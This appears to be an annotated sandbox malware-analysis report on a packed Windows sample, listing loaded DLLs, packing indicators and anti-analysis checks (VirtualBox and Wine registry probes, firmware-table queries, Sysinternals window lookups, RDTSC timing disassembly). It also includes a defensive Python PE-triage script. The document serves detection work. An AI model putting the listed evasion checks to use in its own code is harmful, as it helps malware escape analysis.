Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll (7 further identical entries)
Source: file.exe | Static file information: File size 1865728 > 1048576
Source: file.exe | Static PE information: Raw size of mbsuitke is bigger than: 0x100000 < 0x19da00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.bb0000.0.unpack, section rights of the memory dump vs. the file on disk: :EW;.rsrc:W;.idata :W; :EW;mbsuitke:EW;iyarxzjx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mbsuitke:EW;iyarxzjx:EW;.taggant:EW; (the first, unnamed section is ER on disk but EW once running, the usual sign of a code section made writable for in-place unpacking)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ca976 should be: 0x1c7cf4 (stored and computed header checksums disagree, which happens when the image is rewritten after linking without the header being fixed up)
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: mbsuitke
Source: file.exe | Static PE information: section name: iyarxzjx
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6 (reported 15 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0156E8DE push FFFFFF97h; retf 0_3_0156E8F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01566134 push 00000043h; iretd 0_3_01566136 (reported 10 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_015756AE push FFFFFF97h; retf 0_3_015756A6 (reported 5 times)
A push imm32 followed by retf or iretd is not meaningful control flow (a far return through a pushed constant); sequences like these are what a linear disassembler produces when it walks packed or junk bytes, which fits the section entropies below.
Source: file.exe | Static PE information: section name: (empty) entropy: 7.97990031272369
Source: file.exe | Static PE information: section name: mbsuitke entropy: 7.954841662083077
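The static indicators above (empty and random section names, the entry point in .taggant, two sections at the 8-bit entropy ceiling, a section larger than 1 MiB, a header checksum that no longer matches) are cheap to reproduce outside the sandbox. The script below is an added example written for this page, not Joe Sandbox code and not derived from file.exe: it parses PE headers with the standard library, computes section entropy and the header checksum, and emits findings in the report's wording. The PE it runs on is assembled in memory with the same shape as the report describes (a constructed sample; the section names are borrowed from the report, the bytes are not).

```python
"""Static PE triage with the standard library only: re-implements the section-name/rights, entry-point,
raw-size, entropy and header-checksum checks the report lists, on a PE assembled in memory below."""
import hashlib
import math
import struct
from collections import Counter

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",  # what a linker emits;
                  ".pdata", ".bss", ".tls", ".CRT", "CODE", "DATA"}                    # anything else is worth a look

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0..8); packed or encrypted data sits near 7.9-8.0."""
    n = len(data)
    return 0.0 if n == 0 else -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_pe(data: bytes) -> dict:
    """Minimal PE32/PE32+ header parser: entry RVA, stored CheckSum and the section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1
    if e_lfanew < 0 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff, opt, sections = e_lfanew + 4, e_lfanew + 24, []            # COFF header is 20 bytes
    nsections, opt_size = struct.unpack_from("<H", data, coff + 2)[0], struct.unpack_from("<H", data, coff + 16)[0]
    for i in range(nsections):
        off = opt + opt_size + 40 * i                                 # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize, "rawsize": rawsize,
            "perms": "".join(p for f, p in ((SCN_EXECUTE, "E"), (SCN_READ, "R"), (SCN_WRITE, "W")) if chars & f),
            "entropy": entropy(data[rawptr:rawptr + rawsize])})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0], "sections": sections,
            "checksum": struct.unpack_from("<I", data, opt + 64)[0], "checksum_offset": opt + 64}  # +64 in PE32 and PE32+

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Header checksum as CheckSumMappedFile computes it: 32-bit sum with end-around carry over the
    file (skipping the CheckSum field itself), folded to 16 bits, plus the file length."""
    padded, total = data + b"\0" * (-len(data) % 4), 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:
            total += struct.unpack_from("<I", padded, off)[0]
            if total > 0xFFFFFFFF:
                total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def with_checksum(data: bytes) -> bytes:
    """Copy of the file with CheckSum set to the value a linker would have written."""
    pe, buf = parse_pe(data), bytearray(data)
    struct.pack_into("<I", buf, pe["checksum_offset"], pe_checksum(data, pe["checksum_offset"]))
    return bytes(buf)

def triage(data: bytes) -> list:
    """Findings, in the report's own wording, for the static indicators it lists."""
    pe = parse_pe(data)
    ep, findings = pe["entry_rva"], []
    for s in pe["sections"]:
        name = s["name"]
        if name not in KNOWN_SECTIONS:
            findings.append(f"section name: {name!r} (non-standard)")
        if s["entropy"] > 7.0:
            findings.append(f"section {name!r} entropy: {s['entropy']:.2f}")
        if s["rawsize"] > 0x100000:
            findings.append(f"raw size of {name!r} bigger than 0x100000: 0x{s['rawsize']:x}")
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["rawsize"]):    # the entry point lands here
            if name != ".text":
                findings.append(f"entry point lies in non-standard section {name!r}")
            if "E" in s["perms"] and "W" in s["perms"]:
                findings.append(f"entry point section {name!r} is writable and executable ({s['perms']})")
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["checksum"] and pe["checksum"] != computed:                  # 0 means no checksum was set
        findings.append(f"checksum: 0x{pe['checksum']:x} should be: 0x{computed:x}")
    return findings

def build_pe(sections, entry_rva: int, checksum: int = 0) -> bytes:
    """Assemble a minimal PE32 from (name, va, raw bytes, characteristics) tuples (constructed sample)."""
    hdr_len = 0x40 + 4 + 20 + 0xE0 + 40 * len(sections)
    hdr_len += -hdr_len % 0x200                                        # round headers up to FileAlignment
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)  # i386, 0xE0-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)         # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 64, checksum)
    table, body, raw = b"", b"", hdr_len
    for name, va, data, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va, len(data), raw, 0, 0, 0, 0, chars)
        body, raw = body + data, raw + len(data)
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(hdr_len, b"\0") + body

def sample_pe() -> bytes:
    """Constructed sample shaped like the report: unnamed high-entropy section, random-named section over
    1 MiB, entry point inside a writable+executable .taggant, stale checksum. Not the analysed file."""
    noise = b"".join(hashlib.sha256(i.to_bytes(2, "little")).digest() for i in range(128))  # 0x1000 bytes
    big = bytes(range(256)) * 0x1002                                                          # 0x100200 bytes
    rwx = SCN_EXECUTE | SCN_READ | SCN_WRITE
    return build_pe([("", 0x1000, noise, rwx), (".idata", 0x2000, b"\0" * 0x200, SCN_READ | SCN_WRITE),
                     ("mbsuitke", 0x3000, big, rwx), (".taggant", 0x104000, b"\xcc" * 0x200, rwx)],
                    entry_rva=0x104010, checksum=0x1234)
```

`triage(sample_pe())` yields the same kinds of lines the report prints; to triage a real file, pass `open(path, "rb").read()` instead. A checksum mismatch on its own is weak evidence (plenty of legitimate builds leave CheckSum at zero or stale, which is why the script only reports a nonzero mismatch); it is the combination with a writable+executable entry-point section and near-8.0 entropies that marks a packed sample.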

Boot Survival

The entries under this heading are window-class lookups for Sysinternals monitoring tools (Filemon, Regmon, Process Monitor) plus an error-mode change; none of them is a persistence mechanism, so they read as analysis-tool detection rather than boot survival.
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (2 occurrences)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (3 occurrences)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass (1 occurrence)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass (2 occurrences)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass (1 occurrence)
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX (SetErrorMode; suppresses the error dialog when a file or device open fails)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation (NtQuerySystemInformation with SystemFirmwareTableInformation reads the raw SMBIOS/ACPI tables, whose vendor strings give away VirtualBox, VMware or QEMU)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine (exists only under Wine)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (the ACPI DSDT OEM ID VirtualBox exposes)
The RDTSC entries that follow list, for each pair of consecutive rdtsc reads, the instructions executed between the first read and the second.
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D92033 second address: D9204D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEAA376h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9204D second address: D92086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA0FE8h 0x00000007 jmp 00007FF9ACEA0FE9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D92086 second address: D9208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9208C second address: D92090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D92090 second address: D9209B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9209B second address: D920B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF9ACEA0FD6h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FF9ACEA0FD6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D920B1 second address: D920C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF9ACEAA371h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7CEF2 second address: D7CF17 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF9ACEA0FD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACEA0FE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7CF17 second address: D7CF1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D911E1 second address: D911E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D911E6 second address: D911EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D911EC second address: D911FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF9ACEA0FD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D91648 second address: D91650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D91650 second address: D91654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94DC8 second address: D94DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94DCC second address: D94DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1B9Fh], eax 0x00000010 push 00000000h 0x00000012 mov ecx, dword ptr [ebp+122D36A3h] 0x00000018 push ECC83BB5h 0x0000001d pushad 0x0000001e jng 00007FF9ACEA0FDCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94DF2 second address: D94EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF9ACEAA368h 0x0000000a popad 0x0000000b add dword ptr [esp], 1337C4CBh 0x00000012 mov esi, dword ptr [ebp+122D36A7h] 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FF9ACEAA368h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+122D2711h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FF9ACEAA368h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 movsx edx, bx 0x00000059 push 00000003h 0x0000005b or edi, 630735E2h 0x00000061 call 00007FF9ACEAA369h 0x00000066 jl 00007FF9ACEAA36Eh 0x0000006c jns 00007FF9ACEAA368h 0x00000072 push eax 0x00000073 jne 00007FF9ACEAA36Ah 0x00000079 mov eax, dword ptr [esp+04h] 0x0000007d jmp 00007FF9ACEAA372h 0x00000082 mov eax, dword ptr [eax] 0x00000084 push eax 0x00000085 push edx 0x00000086 jbe 00007FF9ACEAA37Ah 0x0000008c jmp 00007FF9ACEAA374h 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94EB7 second address: D94EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94EBD second address: D94EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94EC1 second address: D94F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FF9ACEA0FDEh 0x00000011 pop eax 0x00000012 mov edi, 0337737Ah 0x00000017 mov dword ptr [ebp+122D1809h], eax 0x0000001d lea ebx, dword ptr [ebp+1245BAC8h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FF9ACEA0FD8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d clc 0x0000003e push eax 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94F16 second address: D94F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D94F6D second address: D95002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA0FDCh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, 528CBAD0h 0x00000012 push edx 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FF9ACEA0FD8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 adc si, F791h 0x00000035 call 00007FF9ACEA0FD9h 0x0000003a jbe 00007FF9ACEA0FDEh 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007FF9ACEA0FE1h 0x00000047 jg 00007FF9ACEA0FD8h 0x0000004d popad 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 pushad 0x00000053 pushad 0x00000054 js 00007FF9ACEA0FD6h 0x0000005a je 00007FF9ACEA0FD6h 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 jg 00007FF9ACEA0FD6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D95002 second address: D9504C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEAA374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007FF9ACEAA36Fh 0x00000012 pushad 0x00000013 jmp 00007FF9ACEAA370h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9504C second address: D95069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA0FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D95069 second address: D950A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FF9ACEAA366h 0x00000009 jns 00007FF9ACEAA366h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop eax 0x00000013 mov edx, dword ptr [ebp+122D389Fh] 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d and esi, dword ptr [ebp+122D2F3Ah] 0x00000023 push 00000003h 0x00000025 mov dword ptr [ebp+122D17F5h], edx 0x0000002b call 00007FF9ACEAA369h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D950A2 second address: D950B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D950B2 second address: D950C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D950C4 second address: D950CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D950CA second address: D950E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEAA371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D950E8 second address: D950EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D950EC second address: D9514B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FF9ACEAA375h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FF9ACEAA368h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1245BAD3h] 0x00000031 mov edi, dword ptr [ebp+122D36B3h] 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007FF9ACEAA36Bh 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB4FFF second address: DB5023 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF9ACEA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF9ACEA0FE5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB3003 second address: DB3031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF9ACEAA366h 0x0000000a pop ebx 0x0000000b jmp 00007FF9ACEAA370h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jne 00007FF9ACEAA366h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jbe 00007FF9ACEAA366h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB3031 second address: DB3045 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF9ACEA0FD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FF9ACEA0FD6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB3D09 second address: DB3D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB3D0F second address: DB3D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF9ACEA0FE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FF9ACEA0FDCh 0x00000011 js 00007FF9ACEA0FD6h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b jno 00007FF9ACEA0FD6h 0x00000021 jnc 00007FF9ACEA0FD6h 0x00000027 jmp 00007FF9ACEA0FE9h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D83AFD second address: D83B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D83B01 second address: D83B0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF9ACEA0FD6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB48C0 second address: DB48C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB48C5 second address: DB48CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB48CB second address: DB48CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D889A6 second address: D889AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBBF07 second address: DBBF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF0FF second address: DBF109 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF9ACEA2286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
